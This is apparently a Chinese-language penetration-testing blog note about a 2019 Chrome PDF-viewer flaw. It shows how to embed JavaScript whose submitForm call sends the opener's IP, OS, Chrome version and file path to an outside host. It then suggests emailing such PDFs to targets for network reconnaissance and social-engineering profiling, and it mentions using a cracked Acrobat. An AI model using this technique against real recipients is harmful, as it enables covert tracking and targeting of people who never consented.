? Social Engineering ? ? Browser ?      2019-11-02

    很久之前的笔记了,在渗透测试中比较好用的一个洞。


一、简述

    截至2019年3月1号为止,Google还没能修复该漏洞。当用户使用Google Chrome作为本地PDF查看器时,利用Google Chrome 的0day激发恶意PDF中的代码,造成一些用户敏感歇息泄露(用户公共IP、OS、Chrome版本以及PDF文件的完整路径)。

    主要问题:pdf允许插入javascript,时Adode 为了自定义化PDF格式。Acrobat语法可以参考 https://www.pdfill.com/download/Acro6JSGuide.pdf

 

二、漏洞复现

    1. 下载的PDF阅读器

    这里使用的 破解版的PDF阅读器Adobe Acrobat Pro DC 2018(Windows)对一个pdf文件进行编辑。如果没有JavaScript,需要在编辑->管理工具中添加。

    2. 选择文档级JavaScript,给及脚本命名,添加app.alert(‘xss’);将会有弹窗。

    3. 修改代码,将发送的请求替代XSS。

function test()
{
    this.submitForm("http://192.168.190.137/");
}
test();

    4. 再次打开修改后的pdf,抓流量会发现如下图所示:

获得的敏感信息包括:目标的公网IP(或者内网边界IP)、目标的操作系统、Google Chrome 版本、打开pdf的路径(系统用户名)。

 

三、漏洞评价

        无法确定目标网络边界时,利用该漏洞结合邮件发送进而确定内网边界。同时通过该漏洞可以获得系统用户名,可以结合社工进行精确定位,或者可以用于内网定位管理员。以上仅仅个人拙见,如有错误,欢迎讨论学习!